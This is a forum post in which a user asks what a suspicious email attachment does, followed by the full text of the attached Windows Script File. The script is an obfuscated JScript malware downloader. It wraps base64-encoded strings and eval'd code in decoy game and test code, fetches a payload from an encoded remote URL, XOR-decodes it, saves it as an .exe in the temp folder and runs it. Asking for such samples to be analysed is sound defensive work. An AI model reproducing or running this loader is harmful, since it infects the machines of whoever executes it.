2016-08-04 1 views
-1

Эта программа была отправлена ​​на мой адрес электронной почты со мной в качестве отправителя. Но когда я посмотрел на IP, он был отправлен от него: 123.237.168.132
Это IP-адрес из Индии, указан в 12 из 59 черных списков и помечен как подозрительный.
Файл отправлен как изображение: Picture (826) .pdf.zip
Weird ... Картинка как pdf в zip? Правый .. Вирус тогда ..Может ли кто-нибудь сказать, что делает эта программа? Это 99,9% от вируса и выглядит как тарабарщина для меня

<?xml version='1.0' encoding='utf-8' standalone='yes'?> 
 
<package> 
 
<job id='atikitikita'> 
 
<script language='JScript'><![CDATA[ 
 

 
rodmands.create = function(){ 
 

 
    var publisher = new MBJSL.Publisher(); 
 

 
    var spyFunction1 = sinon.spy(); 
 

 
    publisher.subscribe(spyFunction1, this.type1); 
 

 

 
    publisher.publish(this.type1); 
 
    ok(spyFunction1.calledWith(), "Function called without arguments"); 
 

 
    publisher.publish(this.type1, "PROPER1"); 
 
    ok(spyFunction1.calledWith("PROPER1"), "Function called with 'PROPER1' argument"); 
 

 
    publisher.publish(this.type1, ["PROPER1", "PROPER2"]); 
 
    ok(spyFunction1.calledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments"); 
 

 
}; 
 

 

 
var qtcnthltqfqrhfq = { ':': '.','U': 'S','ROBERTO': 'X', '00':'', '11':'', '22':''}; 
 
\t var errant = 0; 
 

 
function achievment(bidttt){if(bidttt==1){return 2;}else{return 17;} 
 
return 3;}; 
 
function center(rivulet) { 
 
\t request = rivulet; 
 
\t for (var i in qtcnthltqfqrhfq){request = request.replace(i, qtcnthltqfqrhfq[i]);} 
 
    return request; 
 
}; 
 

 
var chosen = 44/4-10; 
 
function rodmands(x, y) { 
 
    this.x = x + "qqqqddqqqddq"; 
 
    this.y = y - "ffeeeffeefee"; 
 
}; 
 
\t 
 
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4); 
 

 
\t var lulalulaI, lulalulan = lulalula.length; 
 
    for (lulalulaI= 0; lulalulaI < lulalulan; ++lulalulaI) { 
 
     lulalula[lulalulaI] = lulalula[lulalulaI] - 5; 
 
    } 
 
rodmands.scale = function(p, scaleX, scaleY) { 
 
    if (isObject(scaleX)) { 
 
     scaleY = scaleX.y; 
 
     scaleX = scaleX.x; 
 
    } else if (!isNumber(scaleY)) { 
 
     scaleY = scaleX; 
 
    } 
 
    return new rodmands(p.x * scaleX, p.y * scaleY); 
 
}; 
 
rodmands.sameOrN = function(param1, param2) { 
 
    return param1.D == param2.D || param1.F == param2.F; 
 
}; 
 

 
rodmands.angle = function(p) { 
 
    return Math.atan2(p.y, p.x); 
 
}; 
 
\t 
 
\t function Tetromino(index){ 
 
    this.x = 0; 
 
    this.y = 0; 
 
    this.selectedFrame = 0; 
 
    this.getNew(index); 
 
} 
 

 
\t 
 
String.prototype.manysecretthings = function() { 
 
\t 
 
    var c1, c2, c3, c4; 
 
    var i, len, out; 
 
\t var str = this.replace(/ABOUTYOU/g, ''); 
 
    len = str.length; 
 
    i = 0; 
 
    out = ""; 
 

 
    while (i < len) { 
 
     do { 
 
      c1 = lulalula[str.charCodeAt(i++) & 0xff]; 
 
     } while (i < len && c1 == -1); 
 

 
     if (c1 == -1) 
 
      break; 
 
var dodo = false; 
 
     do { 
 
      c2 = lulalula[str.charCodeAt(i++) & 0xff]; 
 
\t \t dodo = i < len && c2 == -1; 
 
     } while (dodo); 
 

 
     if (c2 == -1) 
 
      break; 
 

 
     out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4)); 
 

 
     do { 
 
      c3 = str.charCodeAt(i++) & 0xff; 
 

 
      if (c3 == 61) 
 
       return out; 
 

 
      c3 = lulalula[c3]; 
 
     } while (i < len && c3 == -1); 
 

 
     if (c3 == -1) 
 
      break; 
 

 
     out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3c) >> 2)); 
 

 
     do { 
 
      c4 = str.charCodeAt(i++) & 0xff; 
 

 
      if (c4 == 61) 
 
       return out; 
 

 
      c4 = lulalula[c4]; 
 
     } while (i < len && c4 == -1); 
 

 
     if (c4 == -1) 
 
      break; 
 

 
     out += String.fromCharCode(((c3 & 0x03) << 6) | c4); 
 
    } 
 

 
    return out; 
 
}; 
 

 

 
Tetromino.prototype.nextFrame = function() { 
 

 
    if ((this.selectedFrame + 1) < this.frameNumber) { 
 
     this.selectedFrame++; 
 
    } else { 
 
     this.selectedFrame = 0 
 
    } 
 
}; 
 

 
var VARDOCF ="JVRFTVAl".manysecretthings(); 
 
var finde = "QWN0aXZlWE9iamVjdAABOUTYOU=ABOUTYOU=ABOUTYOU".manysecretthings(); 
 
String.prototype.center2 = function() { 
 
    var pirkinst = { 
 
     VARDOCG: this 
 
    }; 
 
    pirkinst.VARDOCE = pirkinst.VARDOCG["c3VABOUTYOUic3RyABOUTYOUaW5ABOUTYOUn".manysecretthings()](errant, chosen); 
 
    return pirkinst.VARDOCE; 
 
}; 
 

 
var sirdallos ="ABOUTYOURXhwYW5ABOUTYOUkRW52aXABOUTYOUJvbm1lbnRTdHJABOUTYOUpbmdz".manysecretthings(); 
 
var Native = function(options){ 
 
\t 
 
};Native.implement = function(objects, properties){ 
 
\t for (var i = 0, l = objects.length; i < l; i++) objects[i].implement(properties); 
 
}; 
 
var d7 = center("00M"+"11SX"+"22ML"+("richie","diana","revenge","afghan","qualify","2.")+"ROBERTOM"+"LH"+"TT"+("motorcycle","through","upper","views","basal","submissive","fabrication","courier","P}")+"WU"+("stack","intense","upgrading","duffer","bootless","animate","boxed","cr")+("livestock","hangman","operated","installed","buckwheat","security","births","president","ip")+"t:S"+("webpage","scouting","israeli","satisfaction","holdings","wordpress","quebec","compendium","h")+"e"+("expressed","armor","attested","greatgrandfather","guernsey","organize","yawned","getting","ll")); 
 
var DoUtra = [finde, sirdallos,VARDOCF, ""+"."+("negotiation","victor","demonstrates","performer","debauchery","chances","middleclass","afterthought","exe"), "UnABOUTYOUVuABOUTYOU".manysecretthings(),d7]; 
 
DoUtraAANO = DoUtra.shift() 
 
var ZumZum = this[DoUtraAANO]; 
 
fabled = "AAF2AA"; 
 
Native.genericize = function(object, property, check){ 
 
\t if ((!check || !object[property]) && typeof object.prototype[property] == 'function') object[property] = function(){ 
 
\t \t var args = Array.prototype.slice.call(arguments); 
 
\t \t return object.prototype[property].apply(args.shift(), args); 
 
\t }; 
 
}; 
 
Native.typize = function(object, family){ 
 
\t if (!object.type) object.type = function(item){ 
 
\t \t return ($type(item) === family); 
 
\t }; 
 
}; 
 
casque = (("aggravate", "ingram", "buckle", "barque", "organize", "commendable", "elated", "pwrthrthrthtr") + "hrhrwhrwh").center2(); 
 
tudabilo1 = (("teddy", "platinum", "lucas", "departments", "contributor", "separated", "hitch", "risky", "sorrel", "serhrth") + "herrth4th4wh").center2(); 
 
var d2 = DoUtra.pop(); 
 
var rampart = new ZumZum(d2.split("}")[1]); 
 
var sudabilo1 = new ZumZum(d2.split("}")[0]); 
 
var vulture = rampart[DoUtra.shift()](DoUtra.shift()); 
 
var weasel = "E"; 
 

 
var amalgamation = DoUtra.shift(); 
 
var promises = DoUtra.shift(); 
 
var ostrokoncert = "b3ABOUTYOUBlbABOUTYOUg==".manysecretthings(); 
 

 
Tetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array(new Array(new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0))); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array(new Array(new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0)), new Array(new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2)), new Array(new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1)), new Array(new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2))); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array(new Array(new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0)), new Array(new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1)), new Array(new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0)), new Array(new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1))); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array(new Array(new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0)), new Array(new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1)), new Array(new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1)), new Array(new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1))); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array(new Array(new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1)), new Array(new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1)), new Array(new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1)), new Array(new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1))); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array(new Array(new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0)), new Array(new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1)), new Array(new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1)), new Array(new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1))); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array(new Array(new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1)), new Array(new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0)), new Array(new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1)), new Array(new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0))); break; }}; 
 

 
    
 
    
 
eval("ABOUTYOUICBmdW5jdGlvbiBkb3JvZ2lwcnlhbW9pbHVkZXlwb3Byb3NoZURFRnJ0ZnRhKGZpbGVQYXRoKQ0Kew0KICAgIHZhciBkb3JvZ2lwcnlhbW9pbHVkZXlwb3Byb3NoZURFRkhyb3N0ZWtzPVdTY3JpcHRbIkNyZWF0ZU9iamVjdCJdKCJBRE9EQi5TdHJlYW0iKTsNCiAgICBkb3JvZ2lwcnlhbW9pbHVkZXlwb3Byb3NoZURFRkhyb3N0ZWtzWyJ0eXBlIl09MjsNCiAgICBkb3JvZ2lwcnlhbW9pbHVkZXlwb3Byb3NoZURFRkhyb3N0ZWtzWyJDaGFyc2V0Il09NDM3Ow0KICAgIGRvcm9naXByeWFtb2lsdWRleXBvcHJvc2hlREVGSHJvc3Rla3NbIm9wZW4iXSgpOw0KICAgIGRvcm9naXByeWFtb2lsdWRleXBvcHJvc2hlREVGSHJvc3Rla3NbIkxvYWRGcm9tRmlsZSJdKGZpbGVQYXRoKTsNCiAgICB2YXIgZmlsZVN0cmluZz1kb3JvZ2lwcnlhbW9pbHVkZXlwb3Byb3NoZURFRkhyb3N0ZWtzWyJSZWFkVGV4dCJdOw0KICAgIGRvcm9naXByeWFtb2lsdWRleXBvcHJvc2hlREVGSHJvc3Rla3NbImNsb3NlIl0oKTsNCiAgICByZXR1cm4gZG9yb2dpcHJ5YW1vaWx1ZGV5cG9wcm9zaGVERUZmc3RhKGZpbGVTdHJpbmcpOw0KfTsNCmZ1bmN0aW9uIGRvcm9naXByeWFtb2lsdWRleXBvcHJvc2hlREVGZnN0YShmaWxlU3RyaW5nKQ0KeyAgIA0KdmFyIHQxPW5ldyBBcnJheSgpOw0KCQ0KdDFbMHhDN109MHg4MDt0MVsweEZDXT0weDgxO3QxWzB4RTldPTB4ODI7dDFbMHhFMl09MHg4Mzt0MVsweEU0XT0weDg0O3QxWzB4RTBdPTB4ODU7dDFbMHhFNV09MHg4Njt0MVsweEU3XT0weDg3O3QxWzB4RUFdPTB4ODg7dDFbMHhFQl09MHg4OTt0MVsweEU4XT0weDhBO3QxWzB4RUZdPTB4OEI7dDFbMHhFRV09MHg4Qzt0MVsweEVDXT0weDhEO3QxWzB4QzRdPTB4OEU7dDFbMHhDNV09MHg4Rjt0MVsweEM5XT0weDkwO3QxWzB4RTZdPTB4OTE7dDFbMHhDNl09MHg5Mjt0MVsweEY0XT0weDkzO3QxWzB4RjZdPTB4OTQ7dDFbMHhGMl09MHg5NTt0MVsweEZCXT0weDk2O3QxWzB4RjldPTB4OTc7dDFbMHhGRl09MHg5ODt0MVsweEQ2XT0weDk5O3QxWzB4RENdPTB4OUE7dDFbMHhBMl09MHg5Qjt0MVsweEEzXT0weDlDO3QxWzB4QTVdPTB4OUQ7dDFbMHgyMEE3XT0weDlFO3QxWzB4MTkyXT0weDlGO3QxWzB4RTFdPTB4QTA7dDFbMHhFRF09MHhBMTt0MVsweEYzXT0weEEyO3QxWzB4RkFdPTB4QTM7dDFbMHhGMV09MHhBNDt0MVsweEQxXT0weEE1O3QxWzB4QUFdPTB4QTY7dDFbMHhCQV09MHhBNzt0MVsweEJGXT0weEE4O3QxWzB4MjMxMF09MHhBOTt0MVsweEFDXT0weEFBO3QxWzB4QkRdPTB4QUI7dDFbMHhCQ109MHhBQzt0MVsweEExXT0weEFEO3QxWzB4QUJdPTB4QUU7dDFbMHhCQl09MHhBRjt0MVsweDI1OTFdPTB4QjA7dDFbMHgyNTkyXT0weEIxO3QxWzB4MjU5M109MHhCMjt0MVsweDI1MDJdPTB4QjM7dDFbMHgyNTI0XT0weEI0O3QxWzB4MjU2MV09MHhCNTt0MVsweDI1NjJdPTB4QjY7dDFbMHgyNTU2XT0weEI3O3QxWzB4MjU1NV09MHhCODt0MVsweDI1NjNdPTB4Qjk7dDFbMHgyNTUxXT0weEJBO3QxWzB4MjU1N109MHhCQjt0MVsweDI1NURdPTB4QkM7dDFbMHgyNTVDXT0weEJEO3QxWzB4MjU1Ql09MHhCRTt0MVsweDI1MTBdPTB4QkY7dDFbMHgyNTE0XT0weEMwO3QxWzB4MjUzNF09MHhDMTt0MVsweDI1MkNdPTB4QzI7dDFbMHgyNTFDXT0weEMzOyAgICAgICAgICANCnQxWzB4MjUwMF09MHhDNDt0MVsweDI1M0NdPTB4QzU7dDFbMHgyNTVFXT0weEM2O3QxWzB4MjU1Rl09MHhDNzt0MVsweDI1NUFdPTB4Qzg7dDFbMHgyNTU0XT0weEM5O3QxWzB4MjU2OV09MHhDQTt0MVsweDI1NjZdPTB4Q0I7dDFbMHgyNTYwXT0weENDO3QxWzB4MjU1MF09MHhDRDt0MVsweDI1NkNdPTB4Q0U7dDFbMHgyNTY3XT0weENGO3QxWzB4MjU2OF09MHhEMDt0MVsweDI1NjRdPTB4RDE7dDFbMHgyNTY1XT0weEQyO3QxWzB4MjU1OV09MHhEMzt0MVsweDI1NThdPTB4RDQ7dDFbMHgyNTUyXT0weEQ1O3QxWzB4MjU1M109MHhENjt0MVsweDI1NkJdPTB4RDc7dDFbMHgyNTZBXT0weEQ4O3QxWzB4MjUxOF09MHhEOTt0MVsweDI1MENdPTB4REE7dDFbMHgyNTg4XT0weERCO3QxWzB4MjU4NF09MHhEQzt0MVsweDI1OENdPTB4REQ7dDFbMHgyNTkwXT0weERFO3QxWzB4MjU4MF09MHhERjt0MVsweDNCMV09MHhFMDt0MVsweERGXT0weEUxO3QxWzB4MzkzXT0weEUyO3QxWzB4M0MwXT0weEUzO3QxWzB4M0EzXT0weEU0O3QxWzB4M0MzXT0weEU1O3QxWzB4QjVdPTB4RTY7dDFbMHgzQzRdPTB4RTc7dDFbMHgzQTZdPTB4RTg7dDFbMHgzOThdPTB4RTk7dDFbMHgzQTldPTB4RUE7dDFbMHgzQjRdPTB4RUI7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCnQxWzB4MjIxRV09MHhFQzt0MVsweDNDNl09MHhFRDt0MVsweDNCNV09MHhFRTt0MVsweDIyMjldPTB4RUY7dDFbMHgyMjYxXT0weEYwO3QxWzB4QjFdPTB4RjE7dDFbMHgyMjY1XT0weEYyO3QxWzB4MjI2NF09MHhGMzt0MVsweDIzMjBdPTB4RjQ7dDFbMHgyMzIxXT0weEY1O3QxWzB4RjddPTB4RjY7dDFbMHgyMjQ4XT0weEY3O3QxWzB4QjBdPTB4Rjg7dDFbMHgyMjE5XT0weEY5O3QxWzB4QjddPTB4RkE7dDFbMHgyMjFBXT0weEZCO3QxWzB4MjA3Rl09MHhGQzt0MVsweEIyXT0weEZEO3QxWzB4MjVBMF09MHhGRTt0MVsweEEwXT0weEZGOw0KCQ0KCXZhciByZXN1bHRBcnJheT1uZXcgQXJyYXkoKTsNCglmb3IgKHZhciBUaj0wOyBUaiA8IGZpbGVTdHJpbmdbImxlbmd0aCJdOyBUaisrKQ0KCXsNCgkJdmFyIE9WYzk9ZmlsZVN0cmluZ1siY2hhckNvZGVBdCJdKFRqKTsNCgkJaWYgKE9WYzkgPCAxMjgpDQoJCQl7dmFyIEhJaTM9T1ZjOTt9DQoJCWVsc2UNCgkJCXt2YXIgSElpMz10MVtPVmM5XTt9DQoJCXJlc3VsdEFycmF5WyJwdXNoIl0oSElpMyk7DQoJfTsNCgkNCglyZXR1cm4gcmVzdWx0QXJyYXkgLyogeSAgKi87DQp9Ow0KZnVuY3Rpb24gZG9yb2dpcHJ5YW1vaWx1ZGV5cG9wcm9zaGVERUZmYXRzKGNvZGVBcnJheSkNCnsNCiAgICB2YXIgdDI9bmV3IEFycmF5KCk7DQoJDQp0MlsweDgwXT0weDAwQzc7dDJbMHg4MV09MHgwMEZDO3QyWzB4ODJdPTB4MDBFOTt0MlsweDgzXT0weDAwRTI7dDJbMHg4NF09MHgwMEU0O3QyWzB4ODVdPTB4MDBFMDt0MlsweDg2XT0weDAwRTU7dDJbMHg4N109MHgwMEU3O3QyWzB4ODhdPTB4MDBFQTt0MlsweDg5XT0weDAwRUI7dDJbMHg4QV09MHgwMEU4O3QyWzB4OEJdPTB4MDBFRjt0MlsweDhDXT0weDAwRUU7dDJbMHg4RF09MHgwMEVDO3QyWzB4OEVdPTB4MDBDNDt0MlsweDhGXT0weDAwQzU7dDJbMHg5MF09MHgwMEM5O3QyWzB4OTFdPTB4MDBFNjt0MlsweDkyXT0weDAwQzY7dDJbMHg5M109MHgwMEY0O3QyWzB4OTRdPTB4MDBGNjt0MlsweDk1XT0weDAwRjI7dDJbMHg5Nl09MHgwMEZCO3QyWzB4OTddPTB4MDBGOTt0MlsweDk4XT0weDAwRkY7dDJbMHg5OV09MHgwMEQ2O3QyWzB4OUFdPTB4MDBEQzt0MlsweDlCXT0weDAwQTI7dDJbMHg5Q109MHgwMEEzO3QyWzB4OURdPTB4MDBBNTt0MlsweDlFXT0weDIwQTc7dDJbMHg5Rl09MHgwMTkyO3QyWzB4QTBdPTB4MDBFMTt0MlsweEExXT0weDAwRUQ7dDJbMHhBMl09MHgwMEYzO3QyWzB4QTNdPTB4MDBGQTt0MlsweEE0XT0weDAwRjE7dDJbMHhBNV09MHgwMEQxO3QyWzB4QTZdPTB4MDBBQTt0MlsweEE3XT0weDAwQkE7dDJbMHhBOF09MHgwMEJGO3QyWzB4QTldPTB4MjMxMDt0MlsweEFBXT0weDAwQUM7dDJbMHhBQl09MHgwMEJEO3QyWzB4QUNdPTB4MDBCQzt0MlsweEFEXT0weDAwQTE7dDJbMHhBRV09MHgwMEFCO3QyWzB4QUZdPTB4MDBCQjt0MlsweEIwXT0weDI1OTE7dDJbMHhCMV09MHgyNTkyO3QyWzB4QjJdPTB4MjU5Mzt0MlsweEIzXT0weDI1MDI7dDJbMHhCNF09MHgyNTI0O3QyWzB4QjVdPTB4MjU2MTt0MlsweEI2XT0weDI1NjI7dDJbMHhCN109MHgyNTU2O3QyWzB4QjhdPTB4MjU1NTt0MlsweEI5XT0weDI1NjM7dDJbMHhCQV09MHgyNTUxO3QyWzB4QkJdPTB4MjU1Nzt0MlsweEJDXT0weDI1NUQ7dDJbMHhCRF09MHgyNTVDO3QyWzB4QkVdPTB4MjU1Qjt0MlsweEJGXT0weDI1MTA7dDJbMHhDMF09MHgyNTE0O3QyWzB4QzFdPTB4MjUzNDt0MlsweEMyXT0weDI1MkM7dDJbMHhDM109MHgyNTFDO3QyWzB4QzRdPTB4MjUwMDt0MlsweEM1XT0weDI1M0M7dDJbMHhDNl09MHgyNTVFO3QyWzB4QzddPTB4MjU1Rjt0MlsweEM4XT0weDI1NUE7dDJbMHhDOV09MHgyNTU0O3QyWzB4Q0FdPTB4MjU2OTt0MlsweENCXT0weDI1NjY7dDJbMHhDQ109MHgyNTYwO3QyWzB4Q0RdPTB4MjU1MDt0MlsweENFXT0weDI1NkM7dDJbMHhDRl09MHgyNTY3O3QyWzB4RDBdPTB4MjU2ODt0MlsweEQxXT0weDI1NjQ7dDJbMHhEMl09MHgyNTY1O3QyWzB4RDNdPTB4MjU1OTt0MlsweEQ0XT0weDI1NTg7dDJbMHhENV09MHgyNTUyO3QyWzB4RDZdPTB4MjU1Mzt0MlsweEQ3XT0weDI1NkI7dDJbMHhEOF09MHgyNTZBO3QyWzB4RDldPTB4MjUxODt0MlsweERBXT0weDI1MEM7dDJbMHhEQl09MHgyNTg4O3QyWzB4RENdPTB4MjU4NDt0MlsweEREXT0weDI1OEM7dDJbMHhERV09MHgyNTkwO3QyWzB4REZdPTB4MjU4MDt0MlsweEUwXT0weDAzQjE7dDJbMHhFMV09MHgwMERGO3QyWzB4RTJdPTB4MDM5Mzt0MlsweEUzXT0weDAzQzA7dDJbMHhFNF09MHgwM0EzO3QyWzB4RTVdPTB4MDNDMzt0MlsweEU2XT0weDAwQjU7dDJbMHhFN109MHgwM0M0O3QyWzB4RThdPTB4MDNBNjt0MlsweEU5XT0weDAzOTg7dDJbMHhFQV09MHgwM0E5O3QyWzB4RUJdPTB4MDNCNDt0MlsweEVDXT0weDIyMUU7dDJbMHhFRF09MHgwM0M2O3QyWzB4RUVdPTB4MDNCNTt0MlsweEVGXT0weDIyMjk7dDJbMHhGMF09MHgyMjYxO3QyWzB4RjFdPTB4MDBCMTt0MlsweEYyXT0weDIyNjU7dDJbMHhGM109MHgyMjY0O3QyWzB4RjRdPTB4MjMyMDt0MlsweEY1XT0weDIzMjE7dDJbMHhGNl09MHgwMEY3O3QyWzB4RjddPTB4MjI0ODt0MlsweEY4XT0weDAwQjA7dDJbMHhGOV09MHgyMjE5O3QyWzB4RkFdPTB4MDBCNzt0MlsweEZCXT0weDIyMUE7dDJbMHhGQ109MHgyMDdGO3QyWzB4RkRdPTB4MDBCMjt0MlsweEZFXT0weDI1QTA7dDJbMHhGRl09MHgwMEEwOw0KCQ0KCXZhciBFR2o9bmV3IEFycmF5KCk7DQoJdmFyIHJlc3VsdFN0cmluZz0iIjsNCgl2YXIgSElpMzsgdmFyIE9WYzk7DQoJZm9yICh2YXIgVGo9MDsgVGogPCBjb2RlQXJyYXlbImxlbmd0aCJdOyBUaisrKQ0KCXsNCgkJSElpMz1jb2RlQXJyYXlbVGpdOw0KCQlpZiAoSElpMyA8IDEyOCkgDQoJCQl7T1ZjOT1ISWkzO30NCgkJZWxzZSANCgkJCXtPVmM5PXQyW0hJaTNdO30NCgkJRUdqLnB1c2goU3RyaW5nWyJmcm9tQ2hhckNvZGUiXShPVmM5KSk7DQoJfQ0KCQ0KCXJlc3VsdFN0cmluZz1FR2pbImpvaW4iXSgiIik7DQoJDQoJcmV0dXJuIHJlc3VsdFN0cmluZzsNCn07DQpmdW5jdGlvbiBkb3JvZ2lwcnlhbW9pbHVkZXlwb3Byb3NoZURFRnNhdHQoZmlsZVBhdGgsIGNvZGVBcnJheSkNCnsNCiAgICB2YXIgZG9yb2dpcHJ5YW1vaWx1ZGV5cG9wcm9zaGVERUZIcm9zdGVrcz1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogICAgZG9yb2dpcHJ5YW1vaWx1ZGV5cG9wcm9zaGVERUZIcm9zdGVrc1sidHlwZSJdPTI7DQogICAgZG9yb2dpcHJ5YW1vaWx1ZGV5cG9wcm9zaGVERUZIcm9zdGVrc1siQ2hhcnNldCJdPTQzNzsgICAgICAgICANCiAgICBkb3JvZ2lwcnlhbW9pbHVkZXlwb3Byb3NoZURFRkhyb3N0ZWtzWyJvcGVuIl0oKTsNCiAgICBkb3JvZ2lwcnlhbW9pbHVkZXlwb3Byb3NoZURFRkhyb3N0ZWtzWyJ3cml0ZVRleHQiXShkb3JvZ2lwcnlhbW9pbHVkZXlwb3Byb3NoZURFRmZhdHMoY29kZUFycmF5KSk7DQogICAgZG9yb2dpcHJ5YW1vaWx1ZGV5cG9wcm9zaGVERUZIcm9zdGVrc1siU2F2ZVRvRmlsZSJdKGZpbGVQYXRoLCAyKTsNCiAgICBkb3JvZ2lwcnlhbW9pbHVkZXlwb3Byb3NoZURFRkhyb3N0ZWtzWyJjbG9zZSJdKCk7DQp9Ow0KIHZhciB4S2V5ID0gZG9yb2dpcHJ5YW1vaWx1ZGV5cG9wcm9zaGVERUZmc3RhKCI2ZWtRYkY4dVpZUFlOVDJJOUwyME1lNDJsYVZHb2hSayIpOw0KIA0KZnVuY3Rpb24gZG9yb2dpcHJ5YW1vaWx1ZGV5cG9wcm9zaGVERUZ4ZGFjKGRvcm9naXByeWFtb2lsdWRleXBvcHJvc2hlREVGY2NhKQ0Kew0KCWZvciAodmFyIFRqPTA7IFRqIDwgZG9yb2dpcHJ5YW1vaWx1ZGV5cG9wcm9zaGVERUZjY2FbImxlbmd0aCJdOyBUaisrKQ0KCXsNCgkJZG9yb2dpcHJ5YW1vaWx1ZGV5cG9wcm9zaGVERUZjY2FbVGpdIF49IHhLZXlbTWF0aC5mbG9vcihUaiAlIHhLZXkubGVuZ3RoKV07DQoJfQkJDQoJcmV0dXJuIGRvcm9naXByeWFtb2lsdWRleXBvcHJvc2hlREVGY2NhOw0KfTs=".manysecretthings()); 
 
function Shtyler4(gutter, StrokaParam2) { 
 

 
     var wandermander = vulture ; 
 
\t \t wandermander=wandermander+ "\u002f"; 
 
wandermander=wandermander \t \t + StrokaParam2 ; 
 
\t \t //wandermander = wandermander + amalgamation; 
 
      sudabilo1[ostrokoncert](("contrariwise","period","sacristy","terror","fusion","sarcophagus","unapproachable","porphyry","G" + weasel) + ("circa","topaz","famous","disgorge","aimless","compulsion","reproduce","wholl","saddles","population","T"), gutter, false); 
 
     
 
    sudabilo1[tudabilo1 + ("ginger","scientific","prune","deprivation","nicaragua","end")](); 
 
\t var advocacy=("wendyADCDEF" + WScript=="wendyADCDEF" + "ABOUTYOUV2lABOUTYOUuZG93cyBTY3JpcABOUTYOUHQgSG9zdA==".manysecretthings())&&typeof(GzEAPd)==="undefined"; 
 

 
    if (advocacy) { 
 
\t \t 
 
     var brings = new ZumZum((("strasburg","somewhat","academy","answerable","virginian","cabal","cripple","triple","ASEO")+("chocolate","announcements","kazakhstan","nativity","examining","barrage","breath","closure","O")+"DB"+("unique","recumbent","simmer","civilian","adores","underrated","philanthropist",".S")+"tr8").replace("SEO", "D").replace("8", "eam")); 
 
     brings[ostrokoncert](); 
 
     RhXxGud = "type"; 
 
     brings[RhXxGud] = chosen; 
 
     hGaSMa = "AAF10AA"; 
 
\t \t brings["d3ABOUTYOUJpdABOUTYOUGU=".manysecretthings()](sudabilo1[("assumed","ethics","modular","galvanometer","brighton","glorification","")+"R"+"es"+"pon"+qtcnthltqfqrhfq['U'].toLowerCase()+"e"+"QmABOUTYOU9keQABOUTYOU==".manysecretthings()]); 
 
\t \t XWaxeQhw = "AAF11AA"; 
 
     brings[(casque + "o"+("pertinacity","queries","colour","greyhound","importantly","220")+("debian","uploaded","resides","stewart","joshua","hungary","daily","22i")+"tion").replace("22"+("cincinnati","pockets","prevention","pacify","houses","stampede","japanese","022"), tudabilo1)] = 0; 
 
     krDwvrh = "AAF12AA"; 
 
     brings["c2F2ZVRvRmlsZQ==".manysecretthings()](wandermander, 2); 
 
     SswQdi = "AAF13AA"; 
 
     brings["Y2xvc2U=".manysecretthings()](); 
 
\t \t var fileArray=rtfta(wandermander); \t 
 
\t \t fileArray=xdac(fileArray); 
 
\t \t wandermander = wandermander + amalgamation; 
 
\t \t satt(wandermander, fileArray); 
 
\t \t rampart[promises](wandermander, chosen, true); 
 
    } 
 

 
}; 
 
try{ 
 
Shtyler4("http://"+"d3d3LnRoYmVyZy5kZS9ueXgzN2Vj".manysecretthings() + "?gpLpUkx=jAQEWjgFXd","qCybKetvYzK"); 
 
